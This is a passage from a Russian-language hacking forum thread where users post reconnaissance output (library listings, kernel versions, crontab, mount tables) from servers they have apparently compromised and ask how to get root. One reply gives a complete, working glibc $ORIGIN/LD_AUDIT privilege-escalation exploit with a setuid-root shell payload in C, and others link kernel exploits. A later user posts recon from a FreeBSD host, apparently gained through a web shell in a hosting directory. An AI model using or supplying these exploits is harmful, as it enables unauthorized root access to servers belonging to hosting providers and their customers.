    lrwxrwxrwx 1 root root 21 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_files.so.2 -> libnss_file
    s-2.3.4.so
    -rwxr-xr-x 1 root root 23464 2010-01-20 17:34:56.000000000 -0500 /lib/libnss_hesiod-2.3.4.so
    lrwxrwxrwx 1 root root 22 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_hesiod.so.2 -> libnss_hes
    iod-2.3.4.so
    -rwxr-xr-x 1 root root 43036 2010-01-20 17:34:56.000000000 -0500 /lib/libnss_nis-2.3.4.so
    lrwxrwxrwx 1 root root 16 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_nis.so.1 -> libnss1_nis.s
    o.1
    lrwxrwxrwx 1 root root 19 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_nis.so.2 -> libnss_nis-2.
    3.4.so
    -rwxr-xr-x 1 root root 56320 2010-01-20 17:34:56.000000000 -0500 /lib/libnss_nisplus-2.3.4.so
    lrwxrwxrwx 1 root root 23 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_nisplus.so.2 -> libnss_ni
    splus-2.3.4.so
    -rwxr-xr-x 1 root root 95380 2010-01-20 17:34:56.000000000 -0500 /lib/libpthread-0.10.so
    lrwxrwxrwx 1 root root 18 2010-01-24 17:28:58.000000000 -0500 /lib/libpthread.so.0 -> libpthread-0.
    10.so
    -rwxr-xr-x 1 root root 79396 2010-01-20 17:34:56.000000000 -0500 /lib/libresolv-2.3.4.so
    lrwxrwxrwx 1 root root 18 2010-01-24 17:28:58.000000000 -0500 /lib/libresolv.so.2 -> libresolv-2.3.
    4.so
    -rwxr-xr-x 1 root root 47692 2010-01-20 17:34:56.000000000 -0500 /lib/librt-2.3.4.so
    lrwxrwxrwx 1 root root 14 2010-01-24 17:28:58.000000000 -0500 /lib/librt.so.1 -> librt-2.3.4.so
    -rwxr-xr-x 1 root root 25744 2010-01-20 17:34:56.000000000 -0500 /lib/libthread_db-1.0.so
    lrwxrwxrwx 1 root root 19 2010-01-24 17:28:58.000000000 -0500 /lib/libthread_db.so.1 -> libthread_d
    b-1.0.so
    -rwxr-xr-x 1 root root 14160 2010-01-20 17:34:56.000000000 -0500 /lib/libutil-2.3.4.so
    lrwxrwxrwx 1 root root 16 2010-01-24 17:28:58.000000000 -0500 /lib/libutil.so.1 -> libutil-2.3.4.so

    sh-3.00$ mount
    /dev/sda3 on / type ext3 (rw)
    none on /proc type proc (rw)
    none on /sys type sysfs (rw)
    none on /dev/pts type devpts (rw,gid=5,mode=620)
    usbfs on /proc/bus/usb type usbfs (rw)
    /dev/sda1 on /boot type ext3 (rw)
    none on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)

    sh-3.00$ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/sda3 229G 53G 164G 25% /
    /dev/sda1 99M 21M 73M 23% /boot
    none 3.9G 0 3.9G 0% /dev/shm

    sh-3.00$ cat /etc/issue
    CentOS release 4.8 (Final)
    Kernel \r on an \m

    sh-3.00$ cat /etc/crontab

    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly

    sh-3.00$ cat /proc/version
    Linux version 2.6.9-89.0.19.ELsmp ([email protected]) (gcc version 3.4.6 20060404 (Red Hat 3
    .4.6-11)) #1 SMP Fri Jan 8 06:30:48 EST 2010

    sh-3.00$ cat /proc/sys/vm/mmap_min_addr

    sh-3.00$ ls -la /usr/bin/staprun
    ---s--x--x 1 root root 41200 Jul 25 2008 /usr/bin/staprun
    0
     
  11. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    P-29, Enlightenment.
    http://grsecurity.net/~spender/exploits/enlightenment.tgz
     
  12. P-29

    P-29 New Member

    Joined:
    4 Aug 2006
    Messages:
    47
    Likes Received:
    0
    Reputations:
    0
    Пишет sh-3.00$ ./run_null_exploits.sh
    sh: ./run_null_exploits.sh: Permission denied
     
  13. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    System Linux 2.6.18-194.11.1.el5.centos.plusPAE #1 SMP Wed Aug 11 09:10:13 EDT 2010 i686
    Build Date Aug 14 2012 09:55:08

    sh-3.2$ ls -la /boot
    total 19042
    drwxr-xr-x 4 root root 1024 Sep 11 13:15 .
    drwxr-xr-x 22 root root 4096 Sep 12 00:37 ..
    -rw-r--r-- 1 root root 178 Aug 11 2010 .vmlinuz-2.6.18-194.11.1.el5.centos.plusPAE.hmac
    -rw-r--r-- 1 root root 165 Jul 2 2010 .vmlinuz-2.6.18-194.8.1.el5PAE.hmac
    -rw-r--r-- 1 root root 928942 Jan 21 2009 System.map-2.6.18-128.el5PAE
    -rw-r--r-- 1 root root 968481 Aug 11 2010 System.map-2.6.18-194.11.1.el5.centos.plusPAE
    -rw-r--r-- 1 root root 968012 Jul 2 2010 System.map-2.6.18-194.8.1.el5PAE
    -rw-r--r-- 1 root root 67890 Jan 21 2009 config-2.6.18-128.el5PAE
    -rw-r--r-- 1 root root 72933 Aug 11 2010 config-2.6.18-194.11.1.el5.centos.plusPAE
    -rw-r--r-- 1 root root 69550 Jul 2 2010 config-2.6.18-194.8.1.el5PAE
    drwxr-xr-x 2 root root 1024 Sep 11 13:14 grub
    -rw------- 1 root root 2589443 Sep 11 13:14 initrd-2.6.18-128.el5PAE.img
    -rw------- 1 root root 2536431 Jul 8 2010 initrd-2.6.18-128.el5PAE.img.dup_orig
    -rw------- 1 root root 2598576 Aug 13 2010 initrd-2.6.18-194.11.1.el5.centos.plusPAE.img
    -rw------- 1 root root 2574549 Jul 9 2010 initrd-2.6.18-194.8.1.el5PAE.img
    drwx------ 2 root root 12288 Jul 8 2010 lost+found
    -rw-r--r-- 1 root root 80032 Mar 12 2009 message
    -rw-r--r-- 1 root root 101146 Jan 21 2009 symvers-2.6.18-128.el5PAE.gz
    -rw-r--r-- 1 root root 119459 Aug 11 2010 symvers-2.6.18-194.11.1.el5.centos.plusPAE.gz
    -rw-r--r-- 1 root root 111373 Jul 2 2010 symvers-2.6.18-194.8.1.el5PAE.gz
    -rw-r--r-- 1 root root 1824500 Jan 21 2009 vmlinuz-2.6.18-128.el5PAE
    -rw-r--r-- 1 root root 1873780 Aug 11 2010 vmlinuz-2.6.18-194.11.1.el5.centos.plusPAE
    -rw-r--r-- 1 root root 1873588 Jul 2 2010 vmlinuz-2.6.18-194.8.1.el5PAE
    sh-3.2$ ls -la --full-time /lib/lib*
    -rwxr-xr-x 1 root root 7664 2010-07-27 19:46:29.000000000 +0300 /lib/libBrokenLocale-2.5.so
    lrwxrwxrwx 1 root root 22 2010-08-13 13:36:54.000000000 +0300 /lib/libBrokenLocale.so.1 -> libB
    rokenLocale-2.5.so
    -rwxr-xr-x 1 root root 16704 2010-07-27 19:46:29.000000000 +0300 /lib/libSegFault.so
    lrwxrwxrwx 1 root root 15 2010-07-09 13:05:31.000000000 +0300 /lib/libacl.so.1 -> libacl.so.1.1
    .0
    -rwxr-xr-x 1 root root 25624 2010-01-27 00:57:13.000000000 +0200 /lib/libacl.so.1.1.0
    -rwxr-xr-x 1 root root 14128 2010-07-27 19:46:30.000000000 +0300 /lib/libanl-2.5.so
    lrwxrwxrwx 1 root root 13 2010-08-13 13:36:54.000000000 +0300 /lib/libanl.so.1 -> libanl-2.5.so

    lrwxrwxrwx 1 root root 16 2010-07-08 20:50:59.000000000 +0300 /lib/libattr.so.1 -> libattr.so.1
    .1.0
    -rwxr-xr-x 1 root root 15780 2007-01-06 07:12:05.000000000 +0200 /lib/libattr.so.1.1.0
    lrwxrwxrwx 1 root root 17 2010-07-09 13:05:29.000000000 +0300 /lib/libaudit.so.0 -> libaudit.so
    .0.0.0
    -rwxr-xr-x 1 root root 97220 2010-03-31 09:29:12.000000000 +0300 /lib/libaudit.so.0.0.0
    lrwxrwxrwx 1 root root 19 2010-07-09 13:05:29.000000000 +0300 /lib/libauparse.so.0 -> libaupars
    e.so.0.0.0
    -rwxr-xr-x 1 root root 54832 2010-03-31 09:29:12.000000000 +0300 /lib/libauparse.so.0.0.0
    lrwxrwxrwx 1 root root 15 2010-07-09 13:05:28.000000000 +0300 /lib/libblkid.so.1 -> libblkid.so
    .1.0
    -rwxr-xr-x 1 root root 38556 2009-09-03 22:55:35.000000000 +0300 /lib/libblkid.so.1.0
    -rwxr-xr-x 1 root root 1689388 2010-07-27 19:46:30.000000000 +0300 /lib/libc-2.5.so
    lrwxrwxrwx 1 root root 11 2010-08-13 13:36:54.000000000 +0300 /lib/libc.so.6 -> libc-2.5.so
    lrwxrwxrwx 1 root root 14 2010-07-08 20:50:59.000000000 +0300 /lib/libcap.so.1 -> libcap.so.1.1
    0
    -rwxr-xr-x 1 root root 11560 2007-03-14 20:15:10.000000000 +0200 /lib/libcap.so.1.10
    -rwxr-xr-x 1 root root 191708 2010-07-27 19:46:30.000000000 +0300 /lib/libcidn-2.5.so
    lrwxrwxrwx 1 root root 14 2010-08-13 13:36:54.000000000 +0300 /lib/libcidn.so.1 -> libcidn-2.5.
    so
    lrwxrwxrwx 1 root root 17 2010-07-09 13:05:28.000000000 +0300 /lib/libcom_err.so.2 -> libcom_er
    r.so.2.1
    -rwxr-xr-x 1 root root 7748 2009-09-03 22:55:35.000000000 +0300 /lib/libcom_err.so.2.1
    -rwxr-xr-x 1 root root 45432 2010-07-27 19:46:30.000000000 +0300 /lib/libcrypt-2.5.so
    lrwxrwxrwx 1 root root 15 2010-08-13 13:36:54.000000000 +0300 /lib/libcrypt.so.1 -> libcrypt-2.
    5.so
    -rwxr-xr-x 1 root root 1295424 2010-03-26 23:46:10.000000000 +0200 /lib/libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root 19 2010-08-13 13:36:59.000000000 +0300 /lib/libcrypto.so.6 -> libcrypto.
    so.0.9.8e
    -rwxr-xr-x 1 root root 1011760 2010-07-12 19:11:02.000000000 +0300 /lib/libdb-4.3.so
    lrwxrwxrwx 1 root root 18 2010-07-09 13:06:15.000000000 +0300 /lib/libdbus-1.so.3 -> libdbus-1.
    so.3.4.0
    -rwxr-xr-x 1 root root 253392 2010-03-31 16:20:46.000000000 +0300 /lib/libdbus-1.so.3.4.0
    lrwxrwxrwx 1 root root 31 2010-08-13 13:37:00.000000000 +0300 /lib/libdevmapper-event-lvm2.so -
    > libdevmapper-event-lvm2.so.2.02
    -r-xr-xr-x 1 root root 4900 2010-07-29 16:15:22.000000000 +0300 /lib/libdevmapper-event-lvm2.so.2
    .02
    lrwxrwxrwx 1 root root 37 2010-08-13 13:37:00.000000000 +0300 /lib/libdevmapper-event-lvm2mirro
    r.so -> libdevmapper-event-lvm2mirror.so.2.02
    -r-xr-xr-x 1 root root 6900 2010-07-29 16:15:22.000000000 +0300 /lib/libdevmapper-event-lvm2mirro
    r.so.2.02
    lrwxrwxrwx 1 root root 39 2010-08-13 13:37:00.000000000 +0300 /lib/libdevmapper-event-lvm2snaps
    hot.so -> libdevmapper-event-lvm2snapshot.so.2.02
    -r-xr-xr-x 1 root root 4528 2010-07-29 16:15:22.000000000 +0300 /lib/libdevmapper-event-lvm2snaps
    hot.so.2.02
    lrwxrwxrwx 1 root root 25 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper-event.a -> libd
    evmapper-event.a.1.02
    -r-xr-xr-x 1 root root 40828 2010-05-26 15:53:35.000000000 +0300 /lib/libdevmapper-event.a.1.02
    lrwxrwxrwx 1 root root 26 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper-event.so -> lib
    devmapper-event.so.1.02
    -r-xr-xr-x 1 root root 18156 2010-05-26 15:53:36.000000000 +0300 /lib/libdevmapper-event.so.1.02
    lrwxrwxrwx 1 root root 19 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper.a -> libdevmapp
    er.a.1.02
    -r-xr-xr-x 1 root root 414264 2010-05-26 15:53:36.000000000 +0300 /lib/libdevmapper.a.1.02
    lrwxrwxrwx 1 root root 20 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper.so -> libdevmap
    per.so.1.02
    -r-xr-xr-x 1 root root 132620 2010-05-26 15:53:36.000000000 +0300 /lib/libdevmapper.so.1.02
    -rwxr-xr-x 1 root root 20668 2010-07-27 19:46:30.000000000 +0300 /lib/libdl-2.5.so
    lrwxrwxrwx 1 root root 12 2010-08-13 13:36:54.000000000 +0300 /lib/libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx 1 root root 34 2010-07-09 13:06:17.000000000 +0300 /lib/libdmraid-events-isw.so -> l
    ibdmraid-events-isw.so.1.0.0.rc13
    -rwxr-xr-x 1 root root 19388 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid-events-isw.so.1.0.
    0.rc13
    -r-xr-xr-x 1 root root 19388 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid-events-isw.so.1.0.
    0.rc13-17
    lrwxrwxrwx 1 root root 23 2010-07-09 13:06:17.000000000 +0300 /lib/libdmraid.so -> libdmraid.so
    .1.0.0.rc13
    -rwxr-xr-x 1 root root 219804 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid.so.1.0.0.rc13
    -r-xr-xr-x 1 root root 221440 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid.so.1.0.0.rc13-17
    lrwxrwxrwx 1 root root 13 2010-07-09 13:05:28.000000000 +0300 /lib/libe2p.so.2 -> libe2p.so.2.3

    -rwxr-xr-x 1 root root 21608 2009-09-03 22:55:35.000000000 +0300 /lib/libe2p.so.2.3
    lrwxrwxrwx 1 root root 17 2010-07-09 13:05:32.000000000 +0300 /lib/libexpat.so.0 -> libexpat.so
    .0.5.0
    -rwxr-xr-x 1 root root 133120 2009-12-08 16:23:13.000000000 +0200 /lib/libexpat.so.0.5.0
    lrwxrwxrwx 1 root root 16 2010-07-09 13:05:28.000000000 +0300 /lib/libext2fs.so.2 -> libext2fs.
    so.2.4
    -rwxr-xr-x 1 root root 115216 2009-09-03 22:55:35.000000000 +0300 /lib/libext2fs.so.2.4
    -rwxr-xr-x 1 root root 46636 2010-03-31 18:29:40.000000000 +0300 /lib/libgcc_s-4.1.2-20080825.so.1

    lrwxrwxrwx 1 root root 28 2010-07-09 13:05:20.000000000 +0300 /lib/libgcc_s.so.1 -> libgcc_s-4.
    1.2-20080825.so.1
    lrwxrwxrwx 1 root root 23 2010-07-09 13:05:29.000000000 +0300 /lib/libglib-2.0.so.0 -> libglib-
    2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 644472 2009-03-25 03:52:17.000000000 +0200 /lib/libglib-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-07-09 13:05:29.000000000 +0300 /lib/libgmodule-2.0.so.0 -> libgm
    odule-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 11396 2009-03-25 03:52:17.000000000 +0200 /lib/libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-07-09 13:05:29.000000000 +0300 /lib/libgobject-2.0.so.0 -> libgo
    bject-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 259128 2009-03-25 03:52:17.000000000 +0200 /lib/libgobject-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-07-09 13:05:29.000000000 +0300 /lib/libgthread-2.0.so.0 -> libgt
    hread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 14660 2009-03-25 03:52:17.000000000 +0200 /lib/libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 29440 2007-03-15 05:26:22.000000000 +0200 /lib/libiw.so.28
    -rwxr-xr-x 1 root root 7880 2007-01-06 09:57:38.000000000 +0200 /lib/libkeyutils-1.2.so
    lrwxrwxrwx 1 root root 18 2010-07-08 20:51:00.000000000 +0300 /lib/libkeyutils.so.1 -> libkeyut
    ils-1.2.so
    -rwxr-xr-x 1 root root 216544 2010-07-27 19:46:30.000000000 +0300 /lib/libm-2.5.so
    lrwxrwxrwx 1 root root 11 2010-08-13 13:36:54.000000000 +0300 /lib/libm.so.6 -> libm-2.5.so
    -rwxr-xr-x 1 root root 109740 2010-07-27 19:46:30.000000000 +0300 /lib/libnsl-2.5.so
    lrwxrwxrwx 1 root root 13 2010-08-13 13:36:54.000000000 +0300 /lib/libnsl.so.1 -> libnsl-2.5.so

    -rwxr-xr-x 1 root root 36416 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_compat-2.5.so
    lrwxrwxrwx 1 root root 20 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_compat.so.2 -> libnss
    _compat-2.5.so
    -rwxr-xr-x 1 root root 21948 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_dns-2.5.so
    lrwxrwxrwx 1 root root 17 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_dns.so.2 -> libnss_dn
    s-2.5.so
    -rwxr-xr-x 1 root root 50848 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_files-2.5.so
    lrwxrwxrwx 1 root root 19 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_files.so.2 -> libnss_
    files-2.5.so
    -rwxr-xr-x 1 root root 22764 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_hesiod-2.5.so
    lrwxrwxrwx 1 root root 20 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_hesiod.so.2 -> libnss
    _hesiod-2.5.so
    -rwxr-xr-x 1 root root 46536 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_nis-2.5.so
    lrwxrwxrwx 1 root root 17 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_nis.so.2 -> libnss_ni
    s-2.5.so
    -rwxr-xr-x 1 root root 55804 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root 21 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_nisplus.so.2 -> libns
    s_nisplus-2.5.so
    lrwxrwxrwx 1 root root 16 2010-07-09 13:06:04.000000000 +0300 /lib/libpam.so.0 -> libpam.so.0.8
    1.5
    -rwxr-xr-x 1 root root 44532 2010-03-11 19:24:38.000000000 +0200 /lib/libpam.so.0.81.5
    lrwxrwxrwx 1 root root 21 2010-07-09 13:06:04.000000000 +0300 /lib/libpam_misc.so.0 -> libpam_m
    isc.so.0.81.2
    -rwxr-xr-x 1 root root 10168 2010-03-11 19:24:38.000000000 +0200 /lib/libpam_misc.so.0.81.2
    lrwxrwxrwx 1 root root 17 2010-07-09 13:06:04.000000000 +0300 /lib/libpamc.so.0 -> libpamc.so.0
    .81.0
    -rwxr-xr-x 1 root root 9868 2010-03-11 19:24:38.000000000 +0200 /lib/libpamc.so.0.81.0
    lrwxrwxrwx 1 root root 16 2010-07-08 20:51:06.000000000 +0300 /lib/libpcre.so.0 -> libpcre.so.0
    .0.1
    -rwxr-xr-x 1 root root 117448 2007-11-30 07:10:26.000000000 +0200 /lib/libpcre.so.0.0.1
    -rwxr-xr-x 1 root root 54308 2010-03-31 07:53:48.000000000 +0300 /lib/libproc-3.2.7.so
    -rwxr-xr-x 1 root root 137908 2010-07-27 19:46:30.000000000 +0300 /lib/libpthread-2.5.so
    lrwxrwxrwx 1 root root 17 2010-08-13 13:36:54.000000000 +0300 /lib/libpthread.so.0 -> libpthrea
    d-2.5.so
    -rwxr-xr-x 1 root root 80636 2010-07-27 19:46:30.000000000 +0300 /lib/libresolv-2.5.so
    lrwxrwxrwx 1 root root 16 2010-08-13 13:36:54.000000000 +0300 /lib/libresolv.so.2 -> libresolv-
    2.5.so
    -rwxr-xr-x 1 root root 48156 2010-07-27 19:46:30.000000000 +0300 /lib/librt-2.5.so
    lrwxrwxrwx 1 root root 12 2010-08-13 13:36:54.000000000 +0300 /lib/librt.so.1 -> librt-2.5.so
    -rwxr-xr-x 1 root root 93508 2009-09-04 02:05:42.000000000 +0300 /lib/libselinux.so.1
    -rwxr-xr-x 1 root root 159412 2009-09-04 01:49:09.000000000 +0300 /lib/libsemanage.so.1
    -rwxr-xr-x 1 root root 245376 2010-03-31 11:26:18.000000000 +0300 /lib/libsepol.so.1
    lrwxrwxrwx 1 root root 12 2010-07-09 13:05:28.000000000 +0300 /lib/libss.so.2 -> libss.so.2.0
    -rwxr-xr-x 1 root root 20492 2009-09-03 22:55:35.000000000 +0300 /lib/libss.so.2.0
    -rwxr-xr-x 1 root root 291236 2010-03-26 23:46:10.000000000 +0200 /lib/libssl.so.0.9.8e
    lrwxrwxrwx 1 root root 16 2010-08-13 13:36:59.000000000 +0300 /lib/libssl.so.6 -> libssl.so.0.9
    .8e
    -rwxr-xr-x 1 root root 6056 2007-03-14 19:17:47.000000000 +0200 /lib/libsysSp.so
    lrwxrwxrwx 1 root root 19 2010-07-08 20:50:53.000000000 +0300 /lib/libtermcap.so.2 -> libtermca
    p.so.2.0.8
    -rwxr-xr-x 1 root root 13084 2007-01-06 15:01:17.000000000 +0200 /lib/libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root 33852 2010-07-27 19:46:30.000000000 +0300 /lib/libthread_db-1.0.so
    lrwxrwxrwx 1 root root 19 2010-08-13 13:36:54.000000000 +0300 /lib/libthread_db.so.1 -> libthre
    ad_db-1.0.so
    -rwxr-xr-x 1 root root 15308 2010-07-27 19:46:30.000000000 +0300 /lib/libutil-2.5.so
    lrwxrwxrwx 1 root root 14 2010-08-13 13:36:54.000000000 +0300 /lib/libutil.so.1 -> libutil-2.5.
    so
    lrwxrwxrwx 1 root root 14 2010-07-09 13:05:28.000000000 +0300 /lib/libuuid.so.1 -> libuuid.so.1
    .2
    -rwxr-xr-x 1 root root 15704 2009-09-03 22:55:35.000000000 +0300 /lib/libuuid.so.1.2
    lrwxrwxrwx 1 root root 22 2010-08-13 13:37:04.000000000 +0300 /lib/libvolume_id.so.0 -> libvolu
    me_id.so.0.66.0
    -rwxr-xr-x 1 root root 32180 2010-08-05 02:29:24.000000000 +0300 /lib/libvolume_id.so.0.66.0
    lrwxrwxrwx 1 root root 16 2010-07-09 13:05:32.000000000 +0300 /lib/libwrap.so.0 -> libwrap.so.0
    .7.6
    -rwxr-xr-x 1 root root 31344 2009-09-22 01:37:30.000000000 +0300 /lib/libwrap.so.0.7.6
    sh-3.2$ mount
    /dev/md2 on / type ext3 (rw,usrquota,grpquota)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/md3 on /home type ext3 (rw,usrquota,grpquota)
    /dev/md0 on /boot type ext3 (rw)
    tmpfs on /dev/shm type tmpfs (rw)
    tmpfs on /opt/tmp type tmpfs (rw,noexec,nosuid,nodev,size=512M,mode=1777,nr_inodes=40k)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    sh-3.2$ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/md2 48G 24G 22G 52% /
    /dev/md3 402G 203G 179G 54% /home
    /dev/md0 487M 30M 432M 7% /boot
    tmpfs 4.0G 0 4.0G 0% /dev/shm
    tmpfs 512M 0 512M 0% /opt/tmp
    sh-3.2$ cat /etc/issue
    CentOS release 5.5 (Final)
    Kernel \r on an \m

    sh-3.2$ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    0 0 * * * root /usr/local/directadmin/plugins/SMTP_Limiter/scripts/reset_limits.sh #Added by SMTP Li
    miter Plugin
    sh-3.2$ cat /proc/version
    Linux version 2.6.18-194.11.1.el5.centos.plusPAE ([email protected]) (gcc version 4.1.2
    20080704 (Red Hat 4.1.2-48)) #1 SMP Wed Aug 11 09:10:13 EDT 2010
    sh-3.2$ cat /proc/sys/vm/mmap_min_addr
    cat: /proc/sys/vm/mmap_min_addr: Operation not permitted
    sh-3.2$ ls -la /usr/bin/staprun
    ls: /usr/bin/staprun: No such file or directory


    [​IMG]

    Ac1dB1tch3z, enlightenment - не подошли, может руки кривые!
     
    #393 dean999, 1 Oct 2012
    Last edited: 1 Oct 2012
  14. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    mkdir /tmp/dn
    ln /bin/ping /tmp/dn/target
    exec 3< /tmp/dn/target
    ls -l /proc/$$/fd/3
    rm -rf /tmp/dn/
    ls -l /proc/$$/fd/3

    cat > payload.c


    void __attribute__((constructor)) init()
    {
    setuid(0);
    system("/bin/bash");
    }
    ^D



    gcc -w -fPIC -shared -o /tmp/dn payload.c
    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3



    Вот что помогло, всем спасибо!
     
  15. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите как порутать сервер?
    HTML:
    $ uname -a  FreeBSD dh01.hostmedia.net 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Mon Feb  2 17:54:17 EET 2009     [email protected]:/usr/src/sys/amd64/compile/iServer  amd64  $ ls -la /boot  total 1352  drwxr-xr-x   8 root  wheel     512 Feb  4  2009 .  drwxr-xr-x  22 root  wheel     512 Oct  5 08:01 ..  -r--r--r--   1 root  wheel    7642 Jan  1  2009 beastie.4th  -r--r--r--   1 root  wheel    8192 Jan  1  2009 boot  -r--r--r--   1 root  wheel     512 Jan  1  2009 boot0  -r--r--r--   1 root  wheel     512 Jan  1  2009 boot0sio  -r--r--r--   1 root  wheel     512 Jan  1  2009 boot1  -r--r--r--   1 root  wheel    7680 Jan  1  2009 boot2  -r--r--r--   1 root  wheel    1201 Jan  1  2009 cdboot  drwxr-xr-x   2 root  wheel     512 Jan 29  2009 defaults  -r--r--r--   1 root  wheel     818 Jan  1  2009 device.hints  drwxr-xr-x   2 root  wheel     512 Jan  1  2009 firmware  -r--r--r--   1 root  wheel    2258 Jan  1  2009 frames.4th  -r--r--r--   1 root  wheel    7551 Jan  1  2009 gptboot  drwxr-xr-x   2 root  wheel   25088 Feb  2  2009 kernel  drwxr-xr-x   2 root  wheel   25088 Jan 29  2009 kernel.old  -r-xr-xr-x   1 root  wheel  229376 Jan  1  2009 loader  -r--r--r--   1 root  wheel    7554 Jan  1  2009 loader.4th  -rw-r--r--   1 root  wheel      97 May 14  2009 loader.conf  -r--r--r--   1 root  wheel   15219 Jan  1  2009 loader.help  -r--r--r--   1 root  wheel     392 Jan  1  2009 loader.rc  -r--r--r--   1 root  wheel     512 Jan  1  2009 mbr  drwxr-xr-x   2 root  wheel     512 Jan  1  2009 modules  -r--r--r--   1 root  wheel     512 Jan  1  2009 pmbr  -r--r--r--   1 root  wheel  231424 Jan  1  2009 pxeboot  -r--r--r--   1 root  wheel     699 Jan  1  2009 screen.4th  -r--r--r--   1 root  wheel   36470 Jan  1  2009 support.4th  drwxr-xr-x   2 root  wheel     512 Jan  1  2009 zfs  $ ls -la --full-time /lib/lib*  Query did not return anything  $ ls -la --full-time /lib/lib*  Query did not return anything  $ mount  /dev/da0s1a on / (ufs, local)  devfs on /dev (devfs, local)  /dev/da0s1d on /tmp (ufs, local, soft-updates)  /dev/da0s1e on /usr (ufs, local, soft-updates)  /dev/da0s1f on /var (ufs, local, with quotas, soft-updates)  /dev/ad0s1 on /mnt/ad0s1 (ufs, local)  /dev/ad2s1 on /mnt/ad2s1 (ufs, local)  $ df -h  Filesystem     Size    Used   Avail Capacity  Mounted on  /dev/da0s1a    496M    435M     21M    95%    /  devfs          1.0K    1.0K      0B   100%    /dev  /dev/da0s1d    1.9G     10M    1.8G     1%    /tmp  /dev/da0s1e    6.8G    5.1G    1.1G    82%    /usr  /dev/da0s1f    212G    175G     20G    90%    /var  /dev/ad0s1     226G    187G     21G    90%    /mnt/ad0s1  /dev/ad2s1     226G    172G     36G    83%    /mnt/ad2s1  $ cat /etc/issue  Query did not return anything  $ cat /etc/crontab  # /etc/crontab - root's crontab for FreeBSD  #  # $FreeBSD: src/etc/crontab,v 1.32.32.1 2008/11/25 02:59:29 kensmith Exp $  #  SHELL=/bin/sh  PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin  HOME=/var/log  #  #minute	hour	mday	month	wday	who	command  #  */5	*	*	*	*	root	/usr/libexec/atrun  #  # Save some entropy so that /dev/random can re-seed on boot.  */11	*	*	*	*	operator /usr/libexec/save-entropy  #  # Rotate log files every hour, if necessary.  0	*	*	*	*	root	newsyslog  #  # Perform daily/weekly/monthly maintenance.  1	3	*	*	*	root	periodic daily  15	4	*	*	6	root	periodic weekly  30	5	1	*	*	root	periodic monthly  #  # Adjust the time zone if the CMOS clock keeps local time, as opposed to  # UTC time.  See adjkerntz(8) for details.  1,31	0-5	*	*	*	root	adjkerntz -a  $ cat /proc/version  Query did not return anything  $ cat /proc/sys/vm/mmap_min_addr  Query did not return anything  $ pwd  /var/home/195.123.48.53/markiza.biz/public_http  $ ls -la /usr/bin/staprun  Query did not return anything
     
  16. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    http://www.exploit-db.com/exploits/8261/
     
  17. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
